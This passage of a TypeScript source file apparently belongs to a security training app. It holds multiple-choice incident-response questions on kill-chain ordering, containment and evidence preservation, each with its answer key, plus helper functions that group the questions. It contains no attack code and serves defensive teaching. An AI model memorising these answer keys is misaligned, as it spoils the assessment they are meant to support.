    capabilityId: 'cap-kill-chain',
    artifact: KILL_CHAIN,
    prompt: 'Put these events in the order they occurred, earliest first.',
    options: [
      { id: 'a', label: 'B → D → A → E → C' },
      { id: 'b', label: 'A → B → C → D → E' },
      { id: 'c', label: 'D → B → A → C → E' },
      { id: 'd', label: 'B → A → D → E → C' },
    ],
    answerId: 'a',
    explanation:
      'Read the timestamps: 09:12 brute force, 10:14 successful login, 10:22 backdoor account created, 10:40 persistence installed, 11:16 data leaving. That is a complete intrusion in five lines — access, escalation, persistence, exfiltration.',
    level: 'analyse',
  },

  // --- cap-containment -----------------------------------------------------
  {
    id: 'pr-contain-1',
    capabilityId: 'cap-containment',
    prompt:
      'You confirm an attacker has an active session on a production server. Your first instinct is to reboot it. What is the problem with that?',
    options: [
      { id: 'a', label: 'Rebooting takes too long' },
      { id: 'b', label: 'It destroys memory-resident evidence and tips off the attacker, without removing their persistence' },
      { id: 'c', label: 'There is no problem — rebooting is the correct first action' },
      { id: 'd', label: 'It would violate the change management policy' },
    ],
    answerId: 'b',
    explanation:
      'A reboot wipes everything that existed only in RAM — running processes, network connections, injected code — which is often the best evidence you will ever have. It also announces that you noticed. And if they installed a cron job, they are back moments later. Network isolation preserves the evidence and cuts the access.',
    level: 'analyse',
  },

  // --- cap-evidence --------------------------------------------------------
  {
    id: 'pr-evid-1',
    capabilityId: 'cap-evidence',
    prompt: 'Which of these routine actions is MOST likely to destroy evidence you will later need?',
    options: [
      { id: 'a', label: 'Taking a screenshot of the alert' },
      { id: 'b', label: 'Writing notes about what you have found' },
      { id: 'c', label: 'Running a virus scan that quarantines and deletes the suspicious file' },
      { id: 'd', label: 'Telling your team lead' },
    ],
    answerId: 'c',
    explanation:
      'Quarantine-and-delete removes the single artefact you most needed to analyse, and it updates file timestamps on the way. The instinct to clean up is strong and it is usually wrong: preserve first, then remediate.',
    level: 'analyse',
  },
];

const CAPABILITY_BY_ID = new Map(CAPABILITIES.map((capability) => [capability.id, capability]));
const PROBES_BY_CAPABILITY = new Map<string, Probe[]>();
for (const probe of PROBES) {
  const bucket = PROBES_BY_CAPABILITY.get(probe.capabilityId);
  if (bucket) bucket.push(probe);
  else PROBES_BY_CAPABILITY.set(probe.capabilityId, [probe]);
}

export function getCapability(id: string): Capability | null {
  return CAPABILITY_BY_ID.get(id) ?? null;
}

export function probesForCapability(capabilityId: string): Probe[] {
  return PROBES_BY_CAPABILITY.get(capabilityId) ?? [];
}

/** Capabilities that count toward a lane, most important first. */
export function capabilitiesForLane(laneId: string): Capability[] {
  return CAPABILITIES.filter((capability) => capability.lanes[laneId as never] !== undefined).sort(
    (a, b) =>
      (b.lanes[laneId as never] === 'core' ? 1 : 0) - (a.lanes[laneId as never] === 'core' ? 1 : 0),
  );
}

/** The probes a learner takes when baselining for a lane, gently increasing in difficulty. */
export function probesForLane(laneId: string): Probe[] {
  const order = { recall: 0, apply: 1, analyse: 2 } as const;
  const capabilityIds = new Set(capabilitiesForLane(laneId).map((capability) => capability.id));
  return PROBES.filter((probe) => capabilityIds.has(probe.capabilityId)).sort(
    (a, b) => order[a.level] - order[b.level],
  );
}
